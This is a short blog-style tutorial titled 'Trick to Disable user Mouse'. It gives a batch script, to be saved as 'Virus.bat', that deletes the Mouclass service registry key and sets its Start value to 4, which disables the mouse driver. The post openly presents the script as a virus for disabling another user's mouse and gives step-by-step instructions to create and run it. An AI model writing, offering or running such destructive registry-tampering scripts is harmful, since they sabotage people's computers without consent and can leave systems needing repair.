Trick to Disable user Mouse

mouse

Today, I am going to show you to Disable Computer Mouse. This trick is possible with a Batch file. This simple trick will disable user’s mouse with .bat file easily. This trick will work as a Virus.

Let’s begin……..

How to make a Virus to Disable Mouse ?

Step 1. Open Notepad and Paste code given below…

rem ———————————

rem Disable Mouse

set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”

reg delete %key%

reg add %key% /v Start /t REG_DWORD /d 4

rem ———————————–

Step 2. Now save this file as Virus.bat (File extension should be .bat but file name can be anything)

Step 3. Now double click on this .bat file.

you have done.

One thought on “Trick to Disable user Mouse

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>